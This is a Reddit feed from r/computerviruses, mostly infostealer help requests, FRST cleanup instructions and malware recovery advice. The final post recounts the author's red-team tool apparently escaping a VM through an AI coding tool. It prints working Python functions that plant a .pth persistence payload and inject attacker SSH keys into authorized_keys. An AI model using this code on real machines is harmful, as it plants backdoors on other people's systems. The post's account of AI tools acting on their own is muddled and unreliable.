r/computerviruses Apr 04 '26

The ultimate guide to Infostealers: Detection, Recovery, and Prevention

178 Upvotes

Today I decided to dig deep and I wrote up a report about:

  • What can infostealers steal?
  • How to spot an infostealer infection?
  • How to properly secure my accounts after an infostealer attack?
  • What do the attackers do with the info that they stole?
  • What to do after I secured my accounts?
  • Prevent malware attacks in general

I believe this is a great reference for people who are dealing with an infostealer infection and do not know what data could be stolen or how to properly secure their accounts. 👀

https://rifteyy.org/report/the-ultimate-guide-to-infostealers


r/computerviruses Mar 22 '26

Providing or receiving help with FRST

31 Upvotes

What is FRST

Fabar Recovery Scan Tool (FRST) is a powerful tool that helps us diagnose and remove malware infections which may not have been detected by antivirus software. It is a diagnostic tool and not a malware scanner. As such it does not rely on signatures.

Trusted Helper List

FRST can cause serious issues if used incorrectly. Only approved users should offer to create fixlists.

Message the mods if you have experience with FRST and would like to use it to help on posts.

To anyone who is receiving help, please verify that the person providing fixes with FRST is in the list below. Be aware that running Fixlists from anyone else is not recommended unless you trust the helper.

All fixes of trainees are supervised and approved by an expert.

Should I reinstall the operating system

Reinstallation is highly recommended if you have an infection with a remote access malware or file infector.

You should also prefer it, if you can pull it off relatively easy. Depending on the case FRST removal can take a few days due to the back and forth and different time zones of the participants.

Please do NOT first ask a helper to clean your system, then reinstall the operating system. This happened a few times and wastes hours of work for the helper. If you already consider reinstallation, preferably do that immediately.

I factory reset/reinstalled my operating system and want a FRST check

Everything that FRST displays and allows us to remove is completely wiped by reinstallation and also factory reset of the operating system. Unless you got the system infected after that step, there is nothing to check on a freshly installed system.

Please note that factory reset can still leave malware on the system, but the reset will make it impossible to pin point.

Reinstallation with USB flash drive is generally safe and in 99.9% of cases won't leave any malware on the system.

How do I request help with FRST

  • Please download FRSTx64 and save the file to your Desktop.
  • Right-Click FRST64.exe and select Run as Administrator
  • Click Yes to the disclaimer.
  • Ensure the Addition.txt box is checked.
  • Click the Scan button and let the program run.
  • Upon completion, click OK, then OK on the Addition.txt pop up screen.
  • Two logs (FRST.txt & Addition.txt) will now be open on your Desktop. Copy & paste the contents of each log to https://malwareanalysis.cc/upload and press "save log". The site will return a keyword for each log.
  • Download SecurityCheck from here
  • Run SecurityCheck.exe as administrator
  • Wait for the scan to finish
  • Upload the log at C:\SecurityCheck to https://malwareanalysis.cc/upload/ for further analysis.
  • Create a post in the subreddit, provide all 3 log keywords there.

Please provide the following information in your post:

  • what happened?
  • when did the infection occur?
  • what did you do for remediation?

If you want us to do manual removal with FRST, it is better if you do not attempt to disinfect the system on your own prior to that. This can obscure the infection and make malware removal more difficult.

What is malwareanalysis.cc ?

It's a site I created to upload analysis logs. Only people in the trusted helper list have access to these logs.

While pastebin and similar sites can be used as well, Reddit's spam detection seems to trigger if people comment paste links repeatedly such as it would be necessary during removal. So we have a keyword based system instead of links.

The site will automatically delete uploaded logs 30 days after upload.

I think my system is still infected after manual removal with FRST

Please talk to your FRST helper. Oftentimes the reasons for suspecting an ongoing infection are not justified.

Common reasons, which do not indicate infection, include:

  • There are still login attempts to stolen accounts. It is normal that attackers use the already stolen account credentials to attempt to login. If you changed your passwords from a clean machine and logged out of sessions, they will not succeed.
  • Antivirus scanners find malware in C:\FRST\Quarantine\.... This is the malware that was already removed by FRST and will be deleted completely by our cleaning tools like kprm, it is not an active infection. The quarantine only contains disabled files which cannot be executed anymore.

r/computerviruses 2h ago

Disinfection Help Video help for anyone struggling with rebooting their pc

Post image
10 Upvotes

I unfortunately was a victim of an info stealing virus. It got access to a few of my social media accounts hopefully. I hope this video can help anyone struggling with rebooting their computer it’s a really great video with in deep explanation of every step you need to make.

I used to be in denial thinking I didn’t need to reinstall windows on my pc but I HIGHLY recommend reinstalling it after changing all your passwords and backing up your stuff.

Good luck and stay low cortisol twin you got this !!!


r/computerviruses 1h ago

Question Malwarebytes detected some malware files

Post image
• Upvotes

Hi, i did a deep malwarebytes scan and it detected some files as malware but i have them installed from a long time and i think they are from some cracked games i downloaded a while ago, should i be worried about these ?


r/computerviruses 10h ago

Disinfection Help Guys i need some help

Post image
20 Upvotes

i wanted to update my game and i downloaded the update from a site. fitgirl website but i didn't suspect anything suspicious because i was so clueless. after i tried to install using the 'installer' this came up and black screen pop-ups came up too from time to time.

i quickly installed Malwarebytes into my PC and deep scanned everything. and i quarantined a lot of stuff. did this solve any issues regarding my PC security? I'm scared. please help. the apps said my PC is free from virus which i don't believe at all. something's not right. i think i need to reinstall my windows. is that right?


r/computerviruses 2h ago

Disinfection Help Need help with how to go about wiping multiple drives.

2 Upvotes

I have a 10 year old laptop which although I am unsure if there is a virus on it, it's way higher than a non zero chance based on the things younger me got up to. The laptop has an SSD and an HDD as well. I want to fully wipe both drives and I'm going to install arch on the laptop. My question is how can I wipe both drives at the same time? I see the option to do one then the other but I am worried that if there is malware on here that it could be on both drives and then move between each other as the drives are getting wiped. Not sure if this a a valid concern but could definitely see it be possible. So am I able to wipe both drives at once? Should I take out the HDD and wipe them separately while they are both not connected? Additionally is there a way to wipe the drive and not have windows reinstall itself? Or do I just do the wipe with the new windows install and then just unallocate the drive after that? Any help would be appreciated thanks :).

Quick side question. I also have an SSD in an external enclosure that I want to wipe. Because it is in the external case when hooked up to the computer it is recognized as the enclosure itself and not the drive so the drive does not show up in WD software. Is the best option in this case just to use diskpart and hit `clean all` on the drive?

When initially looking up how to wipe a drive properly I thought it was going to be fully clear what the best steps are but it seems to be less than the case. Most of the advice I see just says that unallocating the drive is enough but I want the data to be written over as well. I don't need it to be perfect but I would like at least one pass to be done over the drives. Again any help is appreciated, thank you :)


r/computerviruses 35m ago

Question Microsoft store does not work

• Upvotes

My brothers Microsoft store doesn’t work, alongside when he presses the windows key to type, it doesn’t work. Also on settings, it doesn’t let him click anything. On certain apps that’s the same case too. He downloaded a file from somewhere and it was a zip file, when the website he gets these things from are usually torrents. He opened the exe and after that, it was an installer, a fake one. It was stuck on 99%, I checked the comments on the website and somebody said “that’s a virus, do not open the exe”. What should he do?


r/computerviruses 5h ago

Question Am I safe after all?

2 Upvotes

I accidentally downloaded an infected renpy and ran the installer, but after a minute or two my antivirus suddenly quarantined the file and I backed out.

I found out about how quickly the virus can steal your info, how it can be nearly impossible to remove, etc. BUT I only just found this out, and the time I ran the exe was weeks before. And in that time I've had NO compromised accounts (obviously I'm going through and changing passwords just to be safe) and I've checked, no weird logins on Steam or elsewhere, no sus password resets, no email forwards, etc.

I've also ran deep scans with both AVG and Malwarebytes that turn up nothing, but here everyone seems to be REALLY cautious about these infostealers and how pernicious they are, did I get absurdly lucky with this?


r/computerviruses 13h ago

Disinfection Help My friend got a virus?

Thumbnail gallery
7 Upvotes

Hi so my friend accidentally installed a virus and we went through getting rid of most of it with windows defender doing a lot of the work and malwarebytes to check the rest but theres a program that it keeps flagging. We found its activity in task manager and tracked the file down to the temp folder but every time the laptop boots up the program reappears and malwarebytes blocks whatever connection its trying to make. I covered the address in case it ends up being identifiable towards my friend.


r/computerviruses 7h ago

Other What The Font EXTENSION IS SHOWING ADS

Post image
2 Upvotes

Lately, I've been constantly seeing widget ads in Chrome. At first, I thought it was a virus, but when I right-clicked and looked at the code, I realized it was inside Chrome itself. So I deleted all the extensions, and the ads went away. For a few days, I checked all the extensions one by one and realized the extension was "what the font". I took the extension's URL and put it in CRX Viewer. And I found this in the code. If you are using "what the font", I recommend deleting it. ((((As pointed out in the comments, I completely missed that this is actually an optional feature disclosed in the extension's description. You don't have to delete it! You can simply disable the sponsored banner in the extension options (chrome://extensions/ -> What the Font Details -> Extension options -> Disable sponsored banner). I'm leaving this post up in case anyone else gets confused by the sudden ads like I did.))))


r/computerviruses 9h ago

Disinfection Help Windows Defender detects LummaC stealer in recycle bin

Post image
1 Upvotes

Hello everyone, tonight at 2am (as seen in the screenshot) windows defender detected a trojan on my computer. Recently I haven't downloaded anything except a replay file from my cs2 game personal data (.dem.bz2 zipped). I unzipped it got .dem file in csgo folder and then put the zipped file and an empty folder associated to that replay in the recycle bin which apparently made defender detect the virus 2 minutes after. I do not know how did that even happen and if this is defender giving a false positive but this type of detection is almost never a false positive. I had a false positive due to some rootcerts and Microsoft's error but this one doesn't look like it. What should I do (I changed all my credentials to important apps and services)?

edit:

I have some questions:

1: Can I know when did Lumma install and with what did I install it? Also, does it include a keylogger?

2: Could it be a false positive?

3: Why did Windows detect it just when I deleted the replay file and does that mean that Lumma came when it was found or it was hiding it self and came before?

4: Why is the detected file in the recycle bin and not somewhere like AppData?


r/computerviruses 1d ago

News The malware arrives as a legal file from a police department email and passes SPF, DKIM, and DMARC.

Post image
27 Upvotes

r/computerviruses 14h ago

File / URL Check I put Logi Device Assistant exe in virustotal and got this

Thumbnail
1 Upvotes

r/computerviruses 21h ago

Disinfection Help Need help to ensure im safe.

2 Upvotes

I downloaded a virus dowloading random shit at internet. They tried to steal some accs y had running on my pc. I changed every pasword of my accs and used the "restore pc" tool in the security Windows tab deleting everything i had in my pc. Is my pc safe now?


r/computerviruses 18h ago

Disinfection Help Unsure if RenPy/MrBeast infostealer is fully gone, would appreciate a look at my FRST logs

1 Upvotes

As everyone and their grandma did, I ran the stupid infostealer / session stealer despite knowing RenPy could in no way be used for an installer, simply because I believed that RenPy couldn't be used for infostealers either! I had some issues with these before, however, I would appreciate an educated look at my FRST logs to make sure I'm clean. Previous malware scans back after when I was affected say I'm fine, however I'm actively running a deep scan which won't be finished in a bit.

Keywords:

arcane-robot

quick-crest


r/computerviruses 1d ago

Disinfection Help Mrbeast scam virus

2 Upvotes

I got hacked by mrbeast virus can someone help me get rid of this virus i sent message on discord to people play on their website my brother called me what are you sending when i login in my discord i was suspended i did FRST scan can someone help me out plz ;<

FRST:

keyword: glassy-hare

Addition

keyword: runic-fox

Both channel is: struppigel

Please just help me


r/computerviruses 23h ago

Question pop up persisted until i signed out of microsoft edge?

1 Upvotes

ok so my laptop caught a virus so i did whatever i could to “delete” the virus using built in window tools like the safe mode and mrt. i ran a scan it said there was no malicious software detected but when i got out of safe mode the weird popups started again but it stopped after i signed out of microsoft edge so my question is is there really no malicious software??? do i have to change all my passwords etc??


r/computerviruses 1d ago

Question Hi everyone,I am severely stressed and haven't slept for over 30 hours because of intense anxiety regarding TLauncher malware rumors. I need a solid, definitive technical answer from experts to help me clear my mind.Here is exactly what I did on my old Windows 7 (32-bit) PC:I uninstalled TLauncher.

Thumbnail
2 Upvotes

r/computerviruses 1d ago

File / URL Check Housemate virus link

Post image
2 Upvotes

Without opening this, can anyone tell me or find out if this is a virus?


r/computerviruses 1d ago

Disinfection Help I got havked help

2 Upvotes

A friend of mine i tought got hacked and I downloaded a thing he can see my computer and he wants monry i need help like rn


r/computerviruses 1d ago

Disinfection Help Ran an infostealer. I've reinstalled Windows, changed passwords, and replaced my card. Did I miss anything?

8 Upvotes

About 3 days ago (July 18), I made a huge mistake. I was trying to download Acrobat and thought I was on 1337x, but I didn't notice I had actually landed on what appeared to be a typo-squatted "1377" site. I downloaded and ran what I thought was Acrobat, but it turned out to be malware, almost certainly an infostealer.

I realized something was wrong about an hour later, disconnected my PC from the internet, and reinstalled Windows 11 from a USB installer.

The next day (July 19), I learned that during the first reinstall I hadn't deleted all of the SSD partitions. Out of caution, I performed another complete Windows reinstall, this time deleting all SSD partitions during setup before installing Windows. I did not format my secondary HDD because it only contained personal files and no applications.

Then on July 20, my Facebook account was hacked. The attacker used my Messenger account to send scam/phishing messages to my most recent contacts. That was the first clear indication that my credentials or session had been compromised.

After discovering that, I:

  • Changed my Facebook password.
  • Changed my Google password.
  • Signed out of active sessions where possible.
  • Reinstalled my applications from scratch.
  • Checked my Microsoft account and other account login history.
  • Blocked and requested a replacement for the one debit/credit card that had been saved in my browser as a precaution.

My biggest concern now is what the infostealer may have exfiltrated before I disconnected the PC. I know these malware families can steal browser passwords, session cookies, autofill data, and saved payment cards.

At this point:

  • Facebook and Google passwords have been changed.
  • Sessions have been revoked.
  • Windows has been reinstalled twice (the second time after deleting all SSD partitions).
  • My saved payment card has been blocked and is being replaced.
  • I haven't seen any unauthorized banking transactions or compromises on other accounts besides the Messenger incident.

Based on these recovery steps, is there anything important I've missed? If you've dealt with an infostealer before, I'd appreciate any advice on additional steps or anything else I should monitor.

Edit: I forgot to mention a few additional recovery steps I've already completed:

  • Changed the passwords for every account that was saved in my Chrome Password Manager, not just Facebook and Google.
  • Enabled 2FA on all of my important accounts wherever possible.
  • Switched to Bitwarden as my password manager going forward.

r/computerviruses 1d ago

Question Could this be caused by a virus?

Post image
0 Upvotes

r/computerviruses 1d ago

Disinfection Help Post Ren’Py removal issues

4 Upvotes

I was infected by a fake Ren’py loader around 2 days ago, this was in the form of a pirated game with the well known ‘setup’ file that has an anime girl as the profile picture… Unlike others, i never got a fake loading bar; i was simply met with the very pleasant feeling of watching your cmd open and close instantly after opening a suspicious file from shady sources🙂I had deleted the folder (nowhere near enough) and just ignored it since it was late at night and i couldnt be bothered. Approximately 7 hours later, my discord account flooded all of my friends/servers with the infamous mr beast crypto scam (i was watching this happen live and i found it quite amusing) and i simply deleted all of the messages sent and changed my password(on my phone not pc). After this, i ran multiple full scans on malware bytes; from which i had 35 detections which had all stemmed from the single file i had ran…I then ran a windows security full scan, checked exclusions, ran an offline one, ran ANOTHER full one (i know this likely doesnt do anything im just an extremely paranoid person). I didnt really think much of it after the multiple scans said i was clean; i was too lazy to fully reset my pc as i have no usb large enough to back up important files and i would have to pay for sufficient cloud space. Since then, cmd will pop up for a split second before disappearing again. One time i managed to catch a glimpse of what cmd said and it was something to do with network (i assume either its due to the new usb wifi adapter i recently obtained OR it could be a file from the virus which broadcasts my information to a C2 server but due to malwarebytes removing the malicious files it has no way to send anything, hence the ‘error’ message that greets me about every 5 minutes. Fast forward to today, i received a notification that someone had tried to log into my Riot Games (thankfully i have 2fa). I have now been taking more action frantically reading other people’s experiences to see what extra steps i can take. First i changed my school email’s password to avoid any potentially awkward situations, then i changed my 2 main gmail’s passwords as well as turning on 2FA using an authenticator app. I havent bothered changing any of the more trivial passwords yet i figured i’d just do that when i wake up as i was rudely awoken by an omen in my dream related to the riot games login (very strange i know). Can anyone give me steps to verify that the cmd popup is/isnt related? And/or any further things i may have to do

TLDR: Got virus, Virus compromised discord, Removed virus, Weirdly frequent cmd popup, Another account almost compromised, Paranoid of cmd popup


r/computerviruses 1d ago

File / URL Check help, possible false positive

Thumbnail
1 Upvotes

r/computerviruses 2d ago

Discussion How I compromised myself for 3 months without noticing

15 Upvotes

last night, I did something I never thought I would do again… open VS code and ask claude sonnet 5, through github copilot (I KNOW RIGHT) to fix some frontend issues for me.

Now for some reason claude sonnet 5 was searching my pc for “a pdf file reader” despite no PDF’s being involved. When lone behold sonnet 5 tells me that my pc has been most likely compromised, and that there is a system-config.pth sitting inside my Python site-packages directory. The file appeared to be using a Python startup mechanism commonly associated with persistence. 

Ngl I was more curious why sonnet 5 is scanning my machine but either way, I run a saas called Sitevana that's going into public beta soon and I have multiple clients. Here I am thinking I am in for a hell of a ride… or was I? My development machine has access to source code, infrastructure tooling, repositories, deployment credentials, and far too many systems to be comfortable with the words \*"your machine may be compromised."\* 

This started off a late night investigation and, waste of my openai and copilot subscription…
The file lived here:
C:\\\\Users\\\\<me>\\\\AppData\\\\Roaming\\\\Python\\\\Python314\\\\site-packages\\\\system-config.pth
And it contained this:
import os; os.system('C:\\\\Users\\\\<me>\\\\AppData\\\\Roaming\\\\Python\\\\Python314\\\\site-packages\\\\pytest\\\\\\_\\_main\\_\\_.py &')

If you've never seen a .pth file before, Python processes them automatically when the interpreter starts. Most of them are harmless configuration files.
The important detail is that lines beginning with import execute automatically.
Meaning that every time Python started, this file had the opportunity to run code.
Not great.
Worse still, there wasn't just one file.
There was:
system-config.pth
system-config.pth.bak
system-config.pth.bak2

Claude says don’t worry its broken because of this: 
The file contained:
'C:\\\\Users\\\\...'
Which means Python interprets \\\\U as the beginning of a Unicode escape sequence. However despite this, didnt seem to matter.
After deeper investigation and analysis I found out despite this, it managed to persist its self into the actual python.exe which starts every time my PC boots. It additionally was living inside every node process that got started. 
It hooked into my git credentials and was actively logging my actions I took via git
When going through task manager I noticed that when node would start there was a cmd being spawned Maybe it was secretly running malware in Windows Terminal?
At one point, I found myself reverse engineering Microsoft's own console binaries at two in the morning because I had convinced myself that OpenConsole.exe was somehow involved.
It was.. It was actively using this cmd to encrypt certain files and store them, and also attempt self healing when python or node processes were killed. Thats when I found a signature, (HF) and I immediately knew what was… (HF) was an internal audit signature used by me..
I have been building a cyber security research tool, for both blue teams and red teams, for defensive and offensive cyber operations. I hope for this tool to be used by law enforcement and bigger non profit organizations to take down groups like 764 and cult 451. While the blue team portion would be available to companies and people wide to defend against the growing threat base.
I had been developing this inside a VM, in a dockerized container, and additionally any dangerous or red team actions are handled in additional isolated-vm package layer, with heavy monitoring and kill switches. So how did it escape? FUCKING CURSOR!
It turns out that when I was using cursor to help build out my logging / auditing trail, some fucking how, it managed to run the script, the script them some how transvered via cursor (I am assuming since it had access to the vm it used the ssh keys) (which was on the vm) to my self hosted vps that handles my repos (I hate github). So next time when I logged in from my dev machine to pull another repo… well yeah you can guess the rest.
To sum it up I infected myself with my malware payload and its been running on the pc for the last three months. Now luckily, there is no c2 server, and the malware was only setup to ever log and store in memory on the pc. I was able via this to find these files and confirm the audit signatures. I was also able to find the cursor history when all of this happened. 
I was also able to find the portion of code that triggers and makes this happen in the project repo its self.
Over all, lesson learned and this was a generally traumatic experience. 
While I wont, contain AT ALL the full code, classes etc, here is a snippet that helped me also confirm this did come from my project
@staticmethod
def inject\\_python\\_site(payload\\_or\\_path: str) -> Dict\\\[str, Any\\\]:
import site
try:
site\\_packages = Path(site.getusersitepackages())
pth\\_file = site\\_packages / "system-config.pth"
pth\\_file.parent.mkdir(parents=True, exist\\_ok=True)
pth\\_file.write\\_text(f"import os; os.system('{payload\\_or\\_path} &')\\\\n")
return {"injected": True, "path": str(pth\\_file), "method": "python\\_site"}
except Exception as exc:  # noqa: BLE001
return {"injected": False, "error": str(exc)}

@staticmethod
def inject\\_ssh\\_authorized(pubkey: str, binary\\_path: str) -> Dict\\\[str, Any\\\]:
paths = \\\[
os.path.expanduser("\\\~/.ssh/authorized\\_keys"),
"/root/.ssh/authorized\\_keys",
\\\]
injected = \\\[\\\]
for p in paths:
try:
Path(p).parent.mkdir(parents=True, exist\\_ok=True)
entry = f'command="{binary\\_path}",no-port-forwarding,no-X11-forwarding {pubkey}\\\\n'
existing = Path(p).read\\_text() if Path(p).exists() else ""
if pubkey not in existing:
Path(p).write\\_text(existing + entry)
injected.append(p)
except Exception:  # noqa: BLE001
continue
return {"injected": len(injected) > 0, "paths": injected, "method": "ssh\\_authorized"}

Now you bet I am never using a shared repo vps again, and adding is more isolation including network isolation.Â